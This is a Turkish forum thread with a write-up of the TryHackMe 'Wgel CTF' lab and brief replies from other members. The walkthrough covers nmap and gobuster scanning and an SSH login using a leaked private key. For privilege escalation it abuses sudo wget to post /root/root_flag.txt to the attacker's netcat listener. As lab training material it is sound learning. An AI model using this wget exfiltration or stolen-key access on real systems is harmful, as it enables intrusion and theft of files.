THT DUYURU

 
 
Capture The Flag Vulnerable VM Walkthrough & Capture The Flag (CTF) Writeup Yazabileceğiniz Bölüm

Seçenekler

TryHackMe: Wgel CTF Çözümleri

x4807 - ait Kullanıcı Resmi (Avatar)
Analizci
Üyelik tarihi:
08/2019
Nereden:
\x20
Mesajlar:
955
Konular:
111
Ticaret:
(0) %
6
1284
07-08-2020 03:12
#1
TryHackMe: Wgel CTF Çözümleri

https://tryhackme.com/room/wgelctf

Zorluk Seviyesi: Kolay

Amaç: root ve user bayraklarına erişmek.


Nmap taraması gerçekleştirdiğimizde 22. ve 80. yani ssh ve http portlarının açık olduğunu görüyoruz.

Kod:
nmap -sC -sV 10.10.200.254



80. port ile websiteye girdiğimzide bizi klasik apache ekranı karşılıyor ancak kaynak kodlarını incelediğimizde dikkatimizi çeken bir isim ile karşılaşıyoruz.



Websitesine "common.txt" dosyası ile gobuster taraması gerçekleştirdiğimizde websitenin sitemap'i ile karşılaşıyoruz. Ancak siteyi araştırdığımızda hiçbir şey ile karşılaşamıyoruz. Aynı şekilde sitemap directorysine gobuster taraması gerçekleştirdiğimizde ise içerisinde ssh id barındıran bir directory ile karşılaşıyoruz. Bulduğumuz ssh id'yi indiriyoruz.
(http://10.10.200.254/sitemap/.ssh/)

Kod:
gobuster dir -u  http://10.10.200.254/sitemap -w /usr/share/dirb/wordlists/common.txt




İndirmiş olduğumuz ssh id ve kaynak kodunda bulduğumuz isim ile yaptığımız nmap taramasında açık olduğunu gördüğümüz ssh portuna giriş yapmaya çalıştığımızda başarılı oluyoruz.
Kod:
ssh -i id_rsa [email protected]



Klasörlerin içerisinde biraz dolaştığımızda "********s" klasörünün içerisinde "user_flag.txt" isimli bir dosya ile karşılaşıyoruz. Açtığımızda user flagini görüyoruz.




"sudo -l" komutu ile bağlantı kurduğumuz "jessie" kullanıcısın root yetkisine sahip olduğu alanları incelediğimizde wget ile karşılaşıyoruz. İnternette biraz araştırma sonucu wget ile privilege escalation yapabileceğimizi görüyoruz.



(https://www.hackingarticles.in/linux...ge-escalation/)

Netcat üzerinden 4445. portu dinlemeye alıyoruz. Dinlemeye aldıktan sonra bağlanmış olduğumuz ssh üzerinden wget ile yetki yükseltimi için gerekli olan kodu girdiğimizde netcatde root flagi ile karşılaşıyoruz.
Kod:
sudo /usr/bin/wget --post-file=/root/root_flag.txt http://10.9.92.145:4445
--------------------- systemctl poweroff
Konu x4807 tarafından (07-08-2020 18:37 Saat 18:37 ) değiştirilmiştir.
P4RS - ait Kullanıcı Resmi (Avatar)
Özel Üye
Üyelik tarihi:
01/2017
Nereden:
Ankara
Mesajlar:
5.139
Konular:
626
Teşekkür (Etti):
1779
Teşekkür (Aldı):
3708
Ticaret:
(0) %
08-08-2020 10:15
#2
Ellerine sağlık :=)
---------------------


𝖘𝖊𝖞𝖈𝖎𝖑𝖊𝖗
x4807, R4V3N Teşekkür etti.
DarkS0LDIER - ait Kullanıcı Resmi (Avatar)
İstihbaratçı
Üyelik tarihi:
12/2019
Nereden:
Wyoming/Seul
Mesajlar:
841
Konular:
90
Teşekkür (Etti):
505
Teşekkür (Aldı):
1077
Ticaret:
(0) %
08-08-2020 11:37
#3
Eline sağlık
x4807 Teşekkür etti.
Rozz - ait Kullanıcı Resmi (Avatar)
Analizci
Üyelik tarihi:
08/2019
Nereden:
Malware
Mesajlar:
1.366
Konular:
95
Ticaret:
(0) %
08-08-2020 14:29
#4
Eline saglik
---------------------
This is a "Rozz"
x4807 Teşekkür etti.
x4807 - ait Kullanıcı Resmi (Avatar)
Analizci
Üyelik tarihi:
08/2019
Nereden:
\x20
Mesajlar:
955
Konular:
111
Ticaret:
(0) %
08-08-2020 16:28
#5
Alıntı:
P4RS´isimli üyeden Alıntı Mesajı göster
Ellerine sağlık :=)
Alıntı:
Ellie Williams´isimli üyeden Alıntı Mesajı göster
Eline sağlık
Alıntı:
"Bin4ry´isimli üyeden Alıntı Mesajı göster
Eline saglik
Teşekkür ederim
--------------------- systemctl poweroff
x4807 - ait Kullanıcı Resmi (Avatar)
Analizci
Üyelik tarihi:
08/2019
Nereden:
\x20
Mesajlar:
955
Konular:
111
Ticaret:
(0) %
08-08-2020 20:30
#6
Güncel +++
--------------------- systemctl poweroff
LosT - ait Kullanıcı Resmi (Avatar)
Moderasyon Lider Yardımcısı
Üyelik tarihi:
02/2015
Nereden:
-
Yaş:
21
Mesajlar:
8.105
Konular:
1416
Teşekkür (Etti):
2096
Teşekkür (Aldı):
2929
Ticaret:
(0) %
08-08-2020 20:31
#7
Ellerine sağlık
---------------------
x4807 Teşekkür etti.

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler